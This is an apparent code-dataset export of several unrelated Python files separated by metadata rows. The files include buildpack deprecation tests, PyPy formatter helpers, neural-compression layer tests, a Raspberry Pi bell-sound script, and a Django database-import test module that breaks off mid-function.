'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.281523,
'Total L3s/Runtime Dynamic': 0.180024,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 74.940919
| 124
| 0.681558
| 8,082
| 68,496
| 5.770354
| 0.064464
| 0.123853
| 0.113217
| 0.093662
| 0.943563
| 0.935672
| 0.922249
| 0.897826
| 0.869307
| 0.850566
| 0
| 0.130101
| 0.224699
| 68,496
| 914
| 125
| 74.940919
| 0.748084
| 0
| 0
| 0.664114
| 0
| 0
| 0.658496
| 0.048177
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64f8d1d8f46c3ae075198a6f1e9a1ed15be8949c
| 968
|
py
|
Python
|
tests/usecase/test_deprecations.py
|
pommi/cf-mendix-buildpack
|
26bfa2aeb94edcb2974e717d18628d2e59fc30ad
|
[
"Apache-2.0"
] | null | null | null |
tests/usecase/test_deprecations.py
|
pommi/cf-mendix-buildpack
|
26bfa2aeb94edcb2974e717d18628d2e59fc30ad
|
[
"Apache-2.0"
] | null | null | null |
tests/usecase/test_deprecations.py
|
pommi/cf-mendix-buildpack
|
26bfa2aeb94edcb2974e717d18628d2e59fc30ad
|
[
"Apache-2.0"
] | null | null | null |
import basetest
class TestCaseDeprecationMx5MPK(basetest.BaseTest):
def setUp(self):
super().setUp()
self.setUpCF(
"mx5.3.2_app.mpk",
env_vars={
"DEPLOY_PASSWORD": self.mx_password,
"DEVELOPMENT_MODE": True,
},
)
def test_mx5_mpk(self):
self.startApp(expect_failure=True)
self.assert_string_in_recent_logs(
"Mendix Runtime 5.x is no longer supported"
)
class TestCaseDeprecationMx5MDA(basetest.BaseTest):
def setUp(self):
super().setUp()
self.setUpCF(
"mx5.3.2_app.mda",
env_vars={
"DEPLOY_PASSWORD": self.mx_password,
"DEVELOPMENT_MODE": True,
},
)
def test_mx5_mda(self):
self.startApp(expect_failure=True)
self.assert_string_in_recent_logs(
"Mendix Runtime 5.x is no longer supported"
)
| 25.473684
| 55
| 0.559917
| 102
| 968
| 5.078431
| 0.401961
| 0.069498
| 0.073359
| 0.092664
| 0.833977
| 0.833977
| 0.833977
| 0.833977
| 0.833977
| 0.833977
| 0
| 0.018868
| 0.342975
| 968
| 37
| 56
| 26.162162
| 0.795597
| 0
| 0
| 0.580645
| 0
| 0
| 0.179752
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 1
| 0.129032
| false
| 0.064516
| 0.032258
| 0
| 0.225806
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
64fc04fa72c055c888cc6c2e06ad02b2964a1c0f
| 472
|
py
|
Python
|
pypy/module/_string/formatter.py
|
yxzoro/pypy
|
6e47b3d3e5513d9639a21554963a6ace172ccfee
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
pypy/module/_string/formatter.py
|
yxzoro/pypy
|
6e47b3d3e5513d9639a21554963a6ace172ccfee
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
pypy/module/_string/formatter.py
|
yxzoro/pypy
|
6e47b3d3e5513d9639a21554963a6ace172ccfee
|
[
"Apache-2.0",
"OpenSSL"
] | null | null | null |
def formatter_parser(space, w_unicode):
from pypy.objspace.std.newformat import unicode_template_formatter
tformat = unicode_template_formatter(space, space.unicode_w(w_unicode))
return tformat.formatter_parser()
def formatter_field_name_split(space, w_unicode):
from pypy.objspace.std.newformat import unicode_template_formatter
tformat = unicode_template_formatter(space, space.unicode_w(w_unicode))
return tformat.formatter_field_name_split()
| 42.909091
| 75
| 0.817797
| 62
| 472
| 5.870968
| 0.290323
| 0.087912
| 0.263736
| 0.093407
| 0.824176
| 0.824176
| 0.824176
| 0.824176
| 0.824176
| 0.824176
| 0
| 0
| 0.110169
| 472
| 10
| 76
| 47.2
| 0.866667
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
64fd8657213ab2da2c5e7df1c8f28209f10849ca
| 2,545
|
py
|
Python
|
tests/test_layers_gdn.py
|
tallamjr/NeuralCompression
|
21d05ec0d9f8c52d8742fde36f569b4dad2842a5
|
[
"MIT"
] | 233
|
2021-07-19T18:50:21.000Z
|
2022-03-30T22:06:40.000Z
|
tests/test_layers_gdn.py
|
tallamjr/NeuralCompression
|
21d05ec0d9f8c52d8742fde36f569b4dad2842a5
|
[
"MIT"
] | 79
|
2021-07-22T13:33:45.000Z
|
2022-02-09T16:38:42.000Z
|
tests/test_layers_gdn.py
|
tallamjr/NeuralCompression
|
21d05ec0d9f8c52d8742fde36f569b4dad2842a5
|
[
"MIT"
] | 21
|
2021-07-29T18:27:59.000Z
|
2022-02-28T02:32:53.000Z
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import pytest
import torch
from neuralcompression.layers import SimplifiedGDN, SimplifiedInverseGDN
@pytest.mark.parametrize(
"shape",
[([5, 3, 160, 160]), ([3, 6, 64, 64]), ([1, 12, 32, 32])],
)
def test_simplified_gdn(shape):
gen = torch.Generator()
gen.manual_seed(123)
x = torch.randn(shape)
layer = SimplifiedGDN(x.shape[1])
output = layer(x)
assert x.shape == output.shape
@pytest.mark.parametrize(
"shape",
[([5, 3, 160, 160]), ([3, 6, 64, 64]), ([1, 12, 32, 32])],
)
def test_simplified_gdn_clamp(shape):
gen = torch.Generator()
gen.manual_seed(123)
x = torch.randn(shape)
# floating precision error requires this test to be double
layer = SimplifiedGDN(x.shape[1]).to(torch.double)
params = layer.parameters()
layer.gamma.data = layer.gamma.data - 5
layer.beta.data = layer.beta.data - 5
_ = layer(x.to(torch.double))
# make sure we clamped the params
assert torch.allclose(layer.gamma.data, torch.zeros_like(layer.gamma.data))
assert torch.allclose(
layer.beta.data, torch.ones_like(layer.beta.data) * layer.beta_min
)
# make sure we didn't delete parameters
assert len(list(params)) == 2
@pytest.mark.parametrize(
"shape",
[([5, 3, 160, 160]), ([3, 6, 64, 64]), ([1, 12, 32, 32])],
)
def test_simplified_inverse_gdn(shape):
gen = torch.Generator()
gen.manual_seed(123)
x = torch.randn(shape)
layer = SimplifiedInverseGDN(x.shape[1])
output = layer(x)
assert x.shape == output.shape
@pytest.mark.parametrize(
"shape",
[([5, 3, 160, 160]), ([3, 6, 64, 64]), ([1, 12, 32, 32])],
)
def test_simplified_inverse_gdn_clamp(shape):
gen = torch.Generator()
gen.manual_seed(123)
x = torch.randn(shape)
# floating precision error requires this test to be double
layer = SimplifiedInverseGDN(x.shape[1]).to(torch.double)
params = layer.parameters()
layer.gamma.data = layer.gamma.data - 5
layer.beta.data = layer.beta.data - 5
_ = layer(x.to(torch.double))
# make sure we clamped the params
assert torch.allclose(layer.gamma.data, torch.zeros_like(layer.gamma.data))
assert torch.allclose(
layer.beta.data, torch.ones_like(layer.beta.data) * layer.beta_min
)
# make sure we didn't delete parameters
assert len(list(params)) == 2
| 27.074468
| 79
| 0.656582
| 365
| 2,545
| 4.512329
| 0.232877
| 0.054645
| 0.068002
| 0.063145
| 0.863388
| 0.823315
| 0.823315
| 0.823315
| 0.823315
| 0.823315
| 0
| 0.052088
| 0.200393
| 2,545
| 93
| 80
| 27.365591
| 0.757248
| 0.166601
| 0
| 0.721311
| 0
| 0
| 0.009479
| 0
| 0
| 0
| 0
| 0
| 0.131148
| 1
| 0.065574
| false
| 0
| 0.04918
| 0
| 0.114754
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f7b91660a2d5e48d2cdbaefa23bd0e0d138c04b
| 4,752
|
py
|
Python
|
play_sound.py
|
dareekun/mybell
|
76bd61d8e7314276f5a5835d8950b13773c89456
|
[
"MIT"
] | null | null | null |
play_sound.py
|
dareekun/mybell
|
76bd61d8e7314276f5a5835d8950b13773c89456
|
[
"MIT"
] | null | null | null |
play_sound.py
|
dareekun/mybell
|
76bd61d8e7314276f5a5835d8950b13773c89456
|
[
"MIT"
] | null | null | null |
# PLAY_sound
# play bell sound
# the pygame library is used as it is more compatible with the raspberry pi's sound output
import pygame
from tkinter import *
import time
def PLAY_1():
pygame.init()
pygame.mixer.init()
pygame.mixer.music.load("/home/pi/public/sound/1.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_1") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_2():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/2.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_2!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_3():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/3.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_3!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_4():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/4.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_4!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_5():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/5.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_5!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_6():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/6.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_6!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_7():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/7.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_7!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_8():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/8.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_8!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_9():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/9.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_9!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_10():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/10.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_10!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_11():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/11.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_11!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_12():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/12.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_12!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_13():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/13.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_13!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_14():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/14.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_14!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
def PLAY_15():
pygame.init()
pygame.mixer.music.load("/home/pi/public/sound/15.ogg")
pygame.mixer.music.play()
print ("RINGING!!! PLAY_15!!!") # can be used for troubleshooting audio problem
time.sleep(10) # this delay is to prevent the bell from ringing continuously in the minute
| 39.272727
| 97
| 0.694865
| 722
| 4,752
| 4.530471
| 0.083102
| 0.104249
| 0.146744
| 0.096301
| 0.931519
| 0.931519
| 0.931519
| 0.931519
| 0.752675
| 0.740141
| 0
| 0.023889
| 0.180766
| 4,752
| 120
| 98
| 39.6
| 0.816337
| 0.40362
| 0
| 0.478723
| 0
| 0
| 0.255
| 0.146786
| 0
| 0
| 0
| 0
| 0
| 1
| 0.159574
| true
| 0
| 0.031915
| 0
| 0.191489
| 0.159574
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
710575e9bb6e00a53d6fd173d769767580e1864f
| 223,512
|
py
|
Python
|
trait_browser/management/commands/test_import_db.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | null | null | null |
trait_browser/management/commands/test_import_db.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | 3
|
2020-01-02T20:17:06.000Z
|
2020-01-04T21:13:09.000Z
|
trait_browser/management/commands/test_import_db.py
|
UW-GAC/pie
|
89ae277f5ba1357580d78c3527f26200686308a6
|
[
"MIT"
] | 1
|
2021-10-29T22:15:27.000Z
|
2021-10-29T22:15:27.000Z
|
"""Test the classes and functions in the populate_source_traits management command.
This test module won't run with the usual Django test command, because it's
in an unusual location. Instead, you must specify the path containing this
test module to get these tests to run.
Usage:
./manage.py test trait_browser/management/commands
This test module runs several unit tests and one integration test.
"""
from copy import copy
from datetime import datetime, timedelta
from os.path import exists, join
from os import listdir, stat
from re import compile
from shutil import rmtree
from subprocess import call
from tempfile import mkdtemp
from time import sleep
from unittest import skip
from django.conf import settings
from django.core import management
from django.core.exceptions import ObjectDoesNotExist
from django.test import TestCase, TransactionTestCase
from django.utils import timezone
import watson.search as watson
from core.factories import UserFactory
from tags.factories import TagFactory, TaggedTraitFactory
from tags.models import DCCDecision, DCCReview, StudyResponse, TaggedTrait
from trait_browser.management.commands.import_db import Command, HUNIT_QUERY, STRING_TYPES
from trait_browser.management.commands.db_factory import fake_row_dict
from trait_browser import factories
from trait_browser import models
from trait_browser.test_searches import ClearSearchIndexMixin
CMD = Command()
ORIGINAL_BACKUP_DIR = settings.DBBACKUP_STORAGE_OPTIONS['location']
TEST_DATA_DIR = 'trait_browser/source_db_test_data'
DBGAP_RE = compile(r'(?P<dbgap_id>phs\d{6}\.v\d+?\.pht\d{6}\.v\d+?)')
LOCKED_TABLES_QUERY = 'SHOW OPEN TABLES FROM {db_name} WHERE in_use > 0'
UNLOCKED_TABLES_QUERY = 'SHOW OPEN TABLES FROM {db_name} WHERE in_use = 0'
ALL_TABLES_QUERY = 'SHOW TABLES FROM {db_name}'
def get_devel_db(permissions='readonly'):
"""Get a connection to the devel source db.
Arguments:
permissions (str): 'readonly' or 'full'
Returns:
connection to the MySQL devel db
"""
if permissions == 'readonly':
return CMD._get_source_db(which_db='devel')
elif permissions == 'full':
return CMD._get_source_db(which_db='devel', admin=True)
def clean_devel_db():
"""Remove all existing data from the devel source db.
For each table in a 'show tables' query, remove all of the data in the table
by using the truncate command.
"""
# if verbose: print('Getting source db connection ...')
source_db = get_devel_db(permissions='full')
cursor = source_db.cursor(buffered=True, dictionary=False)
# if verbose: print('Emptying current data from devel source db ...')
db_name = source_db.database.decode('utf-8')
cursor.execute(ALL_TABLES_QUERY.format(db_name=db_name))
tables = [el[0].decode('utf-8') for el in cursor.fetchall()]
tables = [el for el in tables if not el.startswith('view_')]
# Turn off foreign key checks.
cursor.execute('SET FOREIGN_KEY_CHECKS = 0;')
# Remove data from each table.
for t in tables:
cursor.execute('TRUNCATE {};'.format(t))
# Turn foreign key checks back on.
cursor.execute('SET FOREIGN_KEY_CHECKS = 1;')
cursor.close()
source_db.close()
def load_test_source_db_data(filename):
"""Load the data from a specific test data set into the devel source db.
Arguments:
filename (str): name of the .sql mysql dump file, found in TEST_DATA_DIR
"""
filepath = join(TEST_DATA_DIR, filename)
# if verbose: print('Loading test data from ' + filepath + ' ...')
mysql_load = ['mysql', '--defaults-file={}'.format(join(settings.SITE_ROOT, settings.CNF_PATH)),
'--defaults-group-suffix=_topmed_pheno_devel_admin', '<', filepath]
return_code = call(' '.join(mysql_load), shell=True, cwd=settings.SITE_ROOT)
if return_code == 1:
raise ValueError('MySQL failed to load test data.')
def change_data_in_table(table_name, update_field, new_value, where_field, where_value):
"""Run an UPDATE command in the devel db using arguments about what to change.
Arguments:
table_name (str): name of the source db table to UPDATE
update_field (str): name of the source db field to SET
new_value (str): new value to set the update_field field to
where_field (str): field name to use in the WHERE clause of the UPDATE
command; probably should be the pk field name
where_value (str): the value of the where_field to set new values for
"""
source_db = get_devel_db(permissions='full')
cursor = source_db.cursor(buffered=True)
update_cmd = "UPDATE {} SET {}='{}' WHERE {}={};".format(
table_name, update_field, new_value, where_field, where_value)
# print(update_cmd)
cursor.execute(update_cmd)
source_db.commit()
cursor.close()
source_db.close()
def set_backup_dir():
"""Create a new temp dir and change the dbbackup setting to use it."""
backup_dir = mkdtemp()
settings.DBBACKUP_STORAGE_OPTIONS['location'] = backup_dir
return backup_dir
def cleanup_backup_dir():
"""Remove the temp dir that was created to hold backups and revert the setting."""
rmtree(settings.DBBACKUP_STORAGE_OPTIONS['location'])
settings.DBBACKUP_STORAGE_OPTIONS['location'] = ORIGINAL_BACKUP_DIR
# Mixins.
class OpenCloseDBMixin(object):
"""Mixin to add setUp and tearDown methods to TestCases.
setUp opens a new db connection and tearDown closes the connection.
"""
def setUp(self):
"""Get a new source db connection for each test."""
self.source_db = get_devel_db()
self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
def tearDown(self):
"""Close the source db connection at the end of each test."""
self.cursor.close()
self.source_db.close()
def check_imported_pks_match(self, pk_names, tables, models):
"""Check that imported primary keys match those from the appropriate source db table."""
for source_pk, table_name, model in zip(pk_names, tables, models):
# print(source_pk, table_name, model)
query = 'SELECT {} FROM {}'.format(source_pk, table_name)
self.cursor.execute(query)
source_ids = [str(row[source_pk]) for row in self.cursor.fetchall()]
self.assertEqual(sorted(source_ids), sorted(CMD._get_current_pks(model)))
def check_imported_values_match(self, make_args_functions, tables, models):
"""Check that values for imported fields match those from the appropriate source db table."""
for make_args, table_name, model in zip(make_args_functions, tables, models):
# print(table_name, model)
query = 'SELECT * FROM {}'.format(table_name)
self.cursor.execute(query)
for row in self.cursor:
field_types = {el[0]: el[1] for el in self.cursor.description}
model_args = make_args(CMD._fix_row(row, field_types))
django_obj = model.objects.get(pk=model_args[model._meta.pk.name])
for field in model_args:
self.assertEqual(getattr(django_obj, field), model_args[field], msg='Field: {}'.format(field))
def check_imported_m2m_relations_match(self, m2m_tables, group_by_fields, concat_fields, parent_models,
m2m_att_names):
"""Check that imported ManyToMany fields match those from the appropriate M2M source db table."""
for table, group, concat, model, m2m_att in zip(m2m_tables, group_by_fields, concat_fields, parent_models,
m2m_att_names):
query = 'SELECT GROUP_CONCAT({}) AS id_list,{} FROM {} GROUP BY {}'.format(concat, group, table, group)
# print(table, group, concat, model, m2m_att)
# print(query)
self.cursor.execute(query)
for row in self.cursor:
field_types = {el[0]: el[1] for el in self.cursor.description}
row = CMD._fix_row(row, field_types)
source_ids = [int(i) for i in row['id_list'].split(',')]
django_ids = [obj.pk for obj in getattr(model.objects.get(pk=row[group]), m2m_att).all()]
self.assertEqual(sorted(source_ids), sorted(django_ids))
# TestCase superclasses (contain no tests).
class BaseTestDataTestCase(OpenCloseDBMixin, TestCase):
"""Superclass to test importing commands on the base.sql test source db data."""
@classmethod
def setUpClass(cls):
"""Load the base test data, once for all tests."""
# Run the TestCase setUpClass method.
super(BaseTestDataTestCase, cls).setUpClass()
# Clean out the devel db and load the first test dataset.
# By default, all tests will use dataset 1.
clean_devel_db()
load_test_source_db_data('base.sql')
class BaseTestDataReloadingTestCase(OpenCloseDBMixin, TestCase):
"""Superclass to test importing commands on the base.sql test source db data for every test method."""
def setUp(self):
"""Load the base test data, once for each test method."""
# Run the OpenCloseDBMixin setUp method.
super(BaseTestDataReloadingTestCase, self).setUp()
# Clean out the devel db and load the first test dataset.
# By default, all tests will use dataset 1.
clean_devel_db()
load_test_source_db_data('base.sql')
# Tests that don't require test data.
class TestFunctionsTest(TestCase):
"""Tests of the helper functions used by this test script."""
def test_clean_devel_db(self):
"""Test that clean_devel_db() leaves the devel db with 0 rows in each table."""
clean_devel_db()
load_test_source_db_data('base.sql')
clean_devel_db()
source_db = get_devel_db(permissions='full')
cursor = source_db.cursor(buffered=True, dictionary=False)
db_name = source_db.database.decode('utf-8')
cursor.execute(ALL_TABLES_QUERY.format(db_name=db_name))
tables = [el[0].decode('utf-8') for el in cursor.fetchall()]
tables.remove('schema_changes')
tables = [el for el in tables if not el.startswith('view_')]
for tab in tables:
row_count_query = 'SELECT COUNT(*) FROM {};'.format(tab)
cursor.execute(row_count_query)
row_count = cursor.fetchone()[0]
self.assertEqual(row_count, 0)
cursor.close()
source_db.close()
def test_change_data_in_table(self):
"""change_data_in_table successfully makes a change in the devel source db."""
clean_devel_db()
load_test_source_db_data('base.sql')
table = 'global_study'
update_field = 'name'
new_val = 'TEST'
where_field = 'id'
where_value = 1
change_data_in_table(table, update_field, new_val, where_field, where_value)
source_db = get_devel_db()
cursor = source_db.cursor(buffered=True, dictionary=True)
cursor.execute('SELECT * FROM {} WHERE {}={};'.format(table, where_field, where_value))
row = cursor.fetchone()
field_types = {el[0]: el[1] for el in cursor.description}
row = CMD._fix_row(row, field_types)
cursor.close()
source_db.close()
self.assertEqual(row[update_field], new_val)
clean_devel_db()
def test_load_test_source_db_data(self):
"""Loading the base test data results in non-empty tables where expected."""
clean_devel_db()
file_name = 'base.sql'
load_test_source_db_data(file_name)
non_empty_tables = [
'allowed_update_reason',
'component_age_trait',
'component_batch_trait',
'component_harmonized_trait_set',
'component_source_trait',
'global_study',
'harmonization_unit',
'harmonized_function',
'harmonized_trait',
'harmonized_trait_encoded_values',
'harmonized_trait_set',
'harmonized_trait_set_version',
'harmonized_trait_set_version_update_reason',
'schema_changes',
'source_dataset',
'source_dataset_data_files',
'source_dataset_dictionary_files',
'source_study_version',
'source_trait',
'source_trait_encoded_values',
'source_trait_inconsistent_metadata',
'study',
'subcohort',
'subject',
]
empty_tables = [
'source_trait_data',
'harmonized_trait_data',
]
source_db = get_devel_db()
cursor = source_db.cursor(buffered=True, dictionary=True)
for table in non_empty_tables:
cursor.execute('SELECT COUNT(*) FROM {}'.format(table))
count = cursor.fetchone()
self.assertTrue(count['COUNT(*)'] > 0,
msg='Table {} is unexpectedly empty.'.format(table))
for table in empty_tables:
cursor.execute('SELECT COUNT(*) FROM {}'.format(table))
count = cursor.fetchone()
self.assertEqual(count['COUNT(*)'], 0,
msg='Table {} should be empty, but contains data rows.'.format(table))
cursor.close()
source_db.close()
class DbFixersTest(TestCase):
"""Tests of the _fix_[something] methods."""
def test_fix_bytearray_no_bytearrays_left(self):
"""Bytearrays from the row_dict are converted to strings."""
row, types = fake_row_dict()
fixed_row = CMD._fix_bytearray(row)
for k in fixed_row:
self.assertNotIsInstance(fixed_row[k], bytearray)
def test_fix_bytearray_only_bytearrays_altered(self):
"""The non-bytearray values from the row_dict are not altered by _fix_bytearray."""
row, types = fake_row_dict()
fixed_row = CMD._fix_bytearray(row)
bytearray_keys = [k for k in row.keys() if isinstance(row[k], bytearray)]
other_keys = [k for k in row.keys() if not isinstance(row[k], bytearray)]
for k in other_keys:
self.assertEqual(row[k], fixed_row[k])
def test_fix_bytearray_to_string(self):
"""The bytearray values from the row_dict are converted to string type."""
row, types = fake_row_dict()
fixed_row = CMD._fix_bytearray(row)
bytearray_keys = [k for k in row.keys() if isinstance(row[k], bytearray)]
other_keys = [k for k in row.keys() if not isinstance(row[k], bytearray)]
for k in bytearray_keys:
self.assertIsInstance(fixed_row[k], str)
def test_fix_bytearray_empty_bytearray(self):
"""The _fix_bytearray function works on an empty bytearray."""
row = {'empty_bytearray': bytearray('', 'utf-8')}
fixed_row = CMD._fix_bytearray(row)
self.assertEqual(fixed_row['empty_bytearray'], '')
def test_fix_bytearray_non_utf8(self):
"""_fix_bytearray works on a bytearray with a different encoding that utf-8."""
row = {'ascii_bytearray': bytearray('foobar', 'ascii')}
fixed_row = CMD._fix_bytearray(row)
self.assertEqual(fixed_row['ascii_bytearray'], 'foobar')
def test_fix_bytearray_empty_dict(self):
"""_fix_bytearray works on an empty dictionary."""
row = {}
fixed_row = CMD._fix_bytearray(row)
self.assertDictEqual(fixed_row, {})
def test_fix_bytearray_no_bytearrays(self):
"""The row_dict is unchanged when _fix_bytearray is given a dict with no bytearrays in it."""
row = {'a': 1, 'b': 'foobar', 'c': 1.56, 'd': datetime(2000, 1, 1)}
fixed_row = CMD._fix_bytearray(row)
self.assertDictEqual(row, fixed_row)
def test_fix_null_no_none_left(self):
"""None is completely removed by _fix_null for string types."""
types = {str(i): i for i in STRING_TYPES}
row = {str(i): None for i in STRING_TYPES}
fixed_row = CMD._fix_null(row, types)
for k in fixed_row:
self.assertIsNotNone(fixed_row[k])
def test_fix_null_only_none_altered(self):
"""Only dict values of None are altered."""
row, types = fake_row_dict()
fixed_row = CMD._fix_null(row, types)
none_keys = [k for k in row.keys() if row[k] is None]
other_keys = [k for k in row.keys() if row[k] is not None]
for k in other_keys:
self.assertEqual(row[k], fixed_row[k])
def test_fix_null_only_string_types_altered(self):
"""Only None values for string type fields are altered."""
row, types = fake_row_dict()
fixed_row = CMD._fix_null(row, types)
none_string_keys = [k for k in row.keys() if row[k] is None and types[k] in STRING_TYPES]
other_keys = [k for k in row.keys() if k not in none_string_keys]
for k in other_keys:
self.assertEqual(row[k], fixed_row[k], msg='Field: {}'.format(k))
def test_fix_null_string_fields_to_empty_string(self):
"""Dict values of None for each string type field are changed to empty strings."""
row, types = fake_row_dict()
fixed_row = CMD._fix_null(row, types)
none_string_keys = [k for (k, t) in zip(row.keys(), types) if row[k] is None and t in STRING_TYPES]
other_keys = [k for k in row.keys() if k not in none_string_keys]
for k in none_string_keys:
self.assertEqual(fixed_row[k], '')
def test_fix_null_no_nones(self):
"""A dict containing no Nones is unchanged by _fix_null."""
row = {'a': 1, 'b': 'foobar', 'c': 1.56, 'd': datetime(2000, 1, 1)}
types = {field: t for (t, field) in zip(row, STRING_TYPES)}
fixed_row = CMD._fix_null(row, types)
self.assertDictEqual(row, fixed_row)
def test_fix_null_empty_dict(self):
"""An empty dict is unchanged by _fix_null."""
row = {}
types = {}
fixed_row = CMD._fix_null(row, types)
self.assertDictEqual(row, fixed_row)
def test_fix_null_date_stays_none(self):
"""Dict values of datetime and timestamp type are left as None."""
row, types = fake_row_dict()
row['datetime'] = None
row['timestamp'] = None
fixed_row = CMD._fix_null(row, types)
self.assertIsNone(fixed_row['datetime'])
self.assertIsNone(fixed_row['timestamp'])
def test_fix_null_boolean_stays_none(self):
"""Dict values of boolean (tiny int) type are left as None."""
row, types = fake_row_dict()
row['boolean'] = None
fixed_row = CMD._fix_null(row, types)
self.assertIsNone(fixed_row['boolean'])
def test_fix_timezone_result_is_aware(self):
"""The resulting datetimes from _fix_timezone are in fact timezone aware."""
row, types = fake_row_dict()
fixed_row = CMD._fix_timezone(row)
for k in row:
if isinstance(row[k], datetime):
self.assertTrue(
fixed_row[k].tzinfo is not None and fixed_row[k].tzinfo.utcoffset(fixed_row[k]) is not None)
def test_fix_timezone_only_datetimes_altered(self):
"""Non-datetime objects in the dict are not altered by _fix_timezone."""
row, types = fake_row_dict()
fixed_row = CMD._fix_timezone(row)
for k in row:
if not isinstance(row[k], datetime):
self.assertEqual(row[k], fixed_row[k])
def test_fix_timezone_still_datetime(self):
"""Datetime objects in the dict are still of datetime type after conversion by _fix_timezone."""
row, types = fake_row_dict()
fixed_row = CMD._fix_timezone(row)
